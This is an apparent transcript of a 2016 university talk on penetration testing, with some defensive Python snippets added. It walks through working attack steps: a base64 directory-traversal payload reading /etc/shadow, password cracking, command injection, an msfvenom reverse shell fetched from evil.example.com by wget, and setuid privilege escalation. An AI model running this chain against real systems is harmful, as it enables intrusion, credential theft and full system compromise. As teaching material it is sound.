Penetration Tester - Click Monkey or Creative Hacker

Transcription

Penetration Tester - Click Monkey or Creative Hacker?
Sebastian Chrobak - RedTeam Pentesting GmbH
[email protected]
https://www.redteam-pentesting.de/
Security Lab 2016
Research Group IT-Security - RWTH Aachen University
10 May 2016

Dates & Facts
Founded in 2004 at RWTH Aachen
11 penetration testers, always 3 in a team
Conducting penetration tests worldwide
IT Security Research
Specialised exclusively on penetration tests
→ Attacking a network or product with the owner's consent

What is a pentest?
Way to test the security of an IT system
Conducting a controlled attack
Offensive techniques to discover real vulnerabilities
→ Slip into the role of a real attacker

What can be tested?
Today, nearly everything!
Web applications, apps
(Internal) company networks
... and what else?
Home automation systems
Technical devices everyone knows/has

What's up today?
How to approach objectives to be tested?
How to identify vulnerabilities?
Which tools can be used to exploit them?
What are the impacts?
→ Based on real-world examples!

Random session IDs
Random session IDs of a website
TvWjLeJjGhPvAhJjNgBuPiFkRqJmHOL
Or just random at first glance?
TvWjLeJjGhPvAhJjNgBuPiFkRrJmHOL
TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL
TvWjLeJjGhPvAhJjNgBuPiFkRtJmHOL

How much randomness is really in there?
Every second character is uppercase
Only one character changed for three session IDs
TvWjLeJjGhPvAhJjNgBuPiFkRrJmHOL
TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL
TvWjLeJjGhPvAhJjNgBuPiFkRtJmHOL

How much randomness is really in there?
Requests from different IP addresses
From 192.168.1.23:
TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL
From 10.100.1.42:
TvWjLdBhGbHvAhJlMgBuPiFkRtJmHOL

Reversing the randomness
"Secret" key: dahfbhvagjhk
192.168.1.23 = 192168001023
(each letter of the key is shifted forward by the digit below it, then every second character is uppercased)

dahfbhvagjhk
192168001023
------------
ejjghpvahjjn = eJjGhPvAhJjN

TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL

Summary
No random session IDs are generated
Session IDs derivable from IP address
→ Access application on behalf of other users
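A check a defender can run over a sample of issued session IDs, added here as an example and not code from the talk: it counts how many character positions ever change, how far consecutive IDs are apart, and whether the upper/lower-case pattern is fixed. The IDs from the slides serve as sample input, and IDs from Python's CSPRNG-backed secrets module are generated for comparison.

```python
import secrets

# Session IDs shown on the slides, used here as sample input.
OBSERVED_IDS = [
    "TvWjLeJjGhPvAhJjNgBuPiFkRqJmHOL",
    "TvWjLeJjGhPvAhJjNgBuPiFkRrJmHOL",
    "TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL",
    "TvWjLeJjGhPvAhJjNgBuPiFkRtJmHOL",
    "TvWjLdBhGbHvAhJlMgBuPiFkRtJmHOL",  # issued to a different IP address
]


def varying_positions(ids):
    """Indexes at which the IDs differ at all; a sound generator varies every position."""
    width = len(ids[0])
    if any(len(i) != width for i in ids):
        raise ValueError("all IDs must have the same length")
    return [p for p in range(width) if len({i[p] for i in ids}) > 1]


def consecutive_hamming(ids):
    """Number of differing characters between IDs issued one after another."""
    return [sum(a != b for a, b in zip(x, y)) for x, y in zip(ids, ids[1:])]


def case_pattern_fixed(ids):
    """True if the case is the same per position in every ID (e.g. every second character uppercase)."""
    patterns = {"".join("U" if c.isupper() else "l" for c in i) for i in ids}
    return len(patterns) == 1


def assess(ids):
    """Summarise the three indicators; low values or a fixed case pattern point to a weak generator."""
    return {
        "width": len(ids[0]),
        "positions_varying": len(varying_positions(ids)),
        "min_consecutive_distance": min(consecutive_hamming(ids)),
        "case_pattern_fixed": case_pattern_fixed(ids),
    }


def random_ids(n=20):
    """IDs from the standard library's CSPRNG, for comparison with the observed ones."""
    return [secrets.token_urlsafe(23) for _ in range(n)]


if __name__ == "__main__":
    print("observed IDs:", assess(OBSERVED_IDS))
    print("secrets IDs: ", assess(random_ids()))
```

For the five observed IDs only 8 of 31 positions ever change and consecutive IDs differ in a single character, whereas the CSPRNG sample varies at practically every position.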

Image retrieval system
<img src="/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]" width="200"/>

Image retrieval system
<img src="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]" width="200"/>
→ Image remains the same

Wait, what's that URL parameter for?
<img src="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]" width="200"/>
Maybe it is base64 encoded?
$ echo -n "bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" | base64 -d
master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Wait, what's that URL parameter for?
master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA-256 hash, references a particular version
Can be replaced by a dash ("-") to get the latest version
master|root|12345|image/jpeg|7415687361172.jpg|-

Changing the file name
$ echo -n "master|root|12345|text/plain|../../../../../../etc/passwd|-" | base64 -w0
bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0=

Changing the file name & accessing arbitrary files
$ curl http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[...]

What about /etc/shadow?
$ curl http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvc2hhZG93fC0
root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:
[...]
seclab:$6$FSsCdMlf$.pdmpRa2bmK8CwHQQCIFeRgXNsPTUKgyufj/oEuQgp2RDX7kVUCuSp2onAKIowD81.bCCJcnSxgCb5i175auR1:16929:0:9999
itsec:$6$yAmpH0iz$tGOj0CvjHj2GsGltVO.NTddl4.kLeg3fihD8csjhmzQLxmqFXnwbm.hLmLIaa8ZmoszRpFVV.ggFQGhvw8LVO.:16929:0:99999

Cracking the passwords with John the Ripper
$ cat users
root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/
seclab:$6$FSsCdMlf$.pdmpRa2bmK8CwHQQCIFeRgXNsPTUKgyufj/oEuQgp2RDX7kVUCuSp2onAKIowD81.bCCJcnSxgCb5i175auR1
itsec:$6$yAmpH0iz$tGOj0CvjHj2GsGltVO.NTddl4.kLeg3fihD8csjhmzQLxmqFXnwbm.hLmLIaa8ZmoszRpFVV.ggFQGhvw8LVO.
$ john users
[...]
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
seclab           (seclab)
toor             (root)
2g 0:00:00:02 0.45% 2/3 (ETA: 08:17:06) 0.7905g/s 641.5p/s 642.6c/s 642.6C/s bigdog..daisy

Try the harder one using a password list
$ john users --wordlist=top50000.pwd
[...]
Remaining 1 password hash
secret123        (itsec)
1g 0:00:00:23 DONE (2016-05-08 08:10) 0.04237g/s 718.6p/s 718.6c/s 718.6C/s switchfoot..clarinet1
Session completed

Summary
Content of URL parameter context is not verified
The file parameter is vulnerable to directory traversal
→ Retrieve arbitrary files from the server's file system
Web server is started as privileged user (/etc/shadow)
Using John the Ripper to crack the users' passwords (the passwords were weak!)
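A hardened way to handle the context parameter, added here as an example and not code from the talk or from the product it describes: every decoded field is checked before a file path is built, so a traversal string in the file name field is rejected instead of being served. The media root, the MIME allowlist, the field names and the encode_context() helper are assumptions made for this example.

```python
import base64
import os

MEDIA_ROOT = "/srv/medias"  # assumed storage location
ALLOWED_MIME = {"image/jpeg", "image/png", "image/gif"}  # assumed allowlist
FIELDS = ("catalog", "folder", "id", "mime", "filename", "version")  # assumed names
HEX = set("0123456789abcdef")

def encode_context(*fields):
    """Build a context value the way the application does (for sample data only)."""
    return base64.b64encode("|".join(fields).encode()).decode()

SAMPLE_CONTEXT = encode_context(  # the slide's decoded context, re-encoded as sample input
    "master", "root", "12345", "image/jpeg", "7415687361172.jpg",
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855")

def parse_context(context):
    """Decode the base64 context (URLs may omit the padding) into its six fields."""
    padded = context + "=" * (-len(context) % 4)
    try:  # binascii.Error and UnicodeDecodeError are both subclasses of ValueError
        raw = base64.b64decode(padded, validate=True).decode("utf-8")
    except ValueError as exc:
        raise ValueError("context is not valid base64") from exc
    fields = raw.split("|")
    if len(fields) != len(FIELDS):
        raise ValueError("context must contain exactly six fields")
    return dict(zip(FIELDS, fields))

def media_path(context, media_root=MEDIA_ROOT):
    """Validate every field, then confine the resulting path to the media root."""
    ctx = parse_context(context)
    if ctx["mime"] not in ALLOWED_MIME:
        raise ValueError("unsupported media type")
    name = ctx["filename"]
    # Only a bare file name is acceptable: no separators, no parent references.
    if not name or name in (".", "..") or name != os.path.basename(name) or "\\" in name:
        raise ValueError("invalid file name")
    version = ctx["version"]
    if version != "-" and not (len(version) == 64 and set(version) <= HEX):
        raise ValueError("version must be a SHA-256 digest or '-'")
    root = os.path.realpath(media_root)
    path = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, path]) != root:  # belt and braces
        raise ValueError("path escapes the media root")
    return path

def validate(context):
    """None if the context is acceptable, otherwise the reason it was rejected."""
    try:
        media_path(context)
    except ValueError as exc:
        return str(exc)
    return None
```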

Real-world example, really?
Arbitrary file disclosure in SAP hybris Commerce Software Suite might disclose e.g. credit card data
More details:
https://www.redteam-pentesting.de/advisories/rt-sa-2014-016

Backend login form
Administrative backend login form
Weak default credentials
admin:admin
Special characters
; , ' " / % (
→ Command injection?

Verify command injection vulnerability
Show folder listing
;ls;
Print system information
;uname -a;

What happens in the background?
<?php
$login_res = shell_exec(
    'bash check_password.sh ' . $_POST['user'] . ' ' . $_POST['pass']
);
?>

With the injected login, the executed command line becomes:
$login_res = shell_exec(
    'bash check_password.sh admin;ls; password'
);
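The same login call written three ways, added here as an example in Python and not the talk's PHP: the raw concatenation from the slide, the quoted form (what PHP's escapeshellarg() provides), and the argument-vector form that involves no shell at all. The stand-in script that only prints its arguments is an assumption standing in for check_password.sh.

```python
import shlex
import subprocess


def build_command_unsafe(user, password):
    """Mirror of the PHP on the slide: POST values concatenated into a shell command line."""
    return "bash check_password.sh " + user + " " + password


def build_command_quoted(user, password):
    """Each value quoted for the shell (PHP: escapeshellarg), so it stays a single word."""
    return "bash check_password.sh " + shlex.quote(user) + " " + shlex.quote(password)


def shell_tokens(command_line):
    """Tokenise a command line as a POSIX shell would; ';' and friends become operators."""
    return list(shlex.shlex(command_line, posix=True, punctuation_chars=True))


def argv_for_check(user, password):
    """Preferred fix: an argument vector handed to the OS directly, never a shell command line."""
    return ["bash", "check_password.sh", user, password]


def args_received(user, password):
    """Run a stand-in for check_password.sh (assumed; it only prints its arguments) via argv."""
    stand_in = ["sh", "-c", 'printf "%s\\n" "$@"', "check_password.sh"]
    proc = subprocess.run(stand_in + [user, password], capture_output=True, text=True, check=True)
    return proc.stdout.splitlines()


if __name__ == "__main__":
    user, password = "admin;ls;", "password"  # the injected login from the slide
    print("unsafe :", shell_tokens(build_command_unsafe(user, password)))
    print("quoted :", shell_tokens(build_command_quoted(user, password)))
    print("argv   :", args_received(user, password))
```

In the unsafe form the shell sees `;` and `ls` as separate tokens, so a second command runs; in the quoted and argv forms the whole string arrives as one literal argument.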

There are some constraints...
Incoming connections only accepted on port 80
Port 80 already blocked by the web server

Don't reinvent the wheel
Create a connect-back shell using Metasploit Framework
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=6.6.6.6 -f elf -o meterpreter
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 71 bytes
Saved as: meterpreter

Using Metasploit Framework
Starting msfconsole on attacker host
$ ./msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
[...]
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Starting the payload handler...

Using Metasploit Framework
Use the command injection vulnerability:
wget http://evil.example.com/meterpreter
chmod +x meterpreter
./meterpreter

Using Metasploit Framework
[*] Transmitting intermediate stager for over-sized stage...
[*] Meterpreter session 1 opened (6.6.6.6:4444 -> 8.8.8.8:58508) at 2016-05-08 10:30:53 -0400
meterpreter > shell
Process 6664 created.
Channel 1 created.
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

How to expand privileges?
Look for executables with setuid bit ("set user ID upon execution")
→ Run executable with permissions of file's owner
$ find . -user root -perm -4000 -exec ls -al {} \;
-rwsr-xr-x 1 root root 8008 May 8 10:48 /usr/local/check_update
Sadly, it's not world-writable
Analysing executables using IDA multi-processor disassembler

Finally: root access
$ PROG=id /usr/local/check_update
Will execute id.
uid=1000(seclab) gid=1001(seclab) euid=0(root) groups=1001(seclab)

Summary
User-provided input is not escaped
Dangerous setuid executable found
→ Command execution with root privileges
→ Full compromise of the system
Endangers all connected (internal) systems

What are the usual suspects?
Default passwords
admin:admin, root:root
Broken (management) web apps (WiFi router, switches, CI server)
Outdated software (e.g. win2000)
Files on SMB shares accessible:
"passwordlist2016.xlsx"
"password for passwordlist.txt"
Missing/Broken authorisation
Certificate verification failures
curl_opt_VERIFY_CERT=0
Homebrew trust managers

More examples on our website
o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials
AVM FRITZ!Box: Remote Code Execution via Buffer Overflow
Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components
EntryPass N5200 Credentials Disclosure
https://www.redteam-pentesting.de/advisories/

What does a pentester's day look like?
Regular usage of the software:
Understand the application's functionality and behaviour
→ Basis for any further exploitation
Provoke errors, watch for anomalies
Uncover what's happening in the background:
Analyse the communication, understand how services play together

What does a pentester's day look like?
Identify weaknesses and exploit vulnerabilities
Manipulate parameters
Insert unexpected values
Change perspectives
Be creative, use functions differently!
Documentation
About 30% of the time of a pentest
Final Meeting
Discussion of vulnerabilities
Live demo

But wait, aren't there tools to do this?
Tools cannot find non-obvious vulnerabilities
Especially not the interesting ones!
Pentesting is handwork!
But tools ease the exploitation
Know your toolbox and pick the right one!

This is the end.
Thank you for listening!
Any questions?
Next: Open discussion round!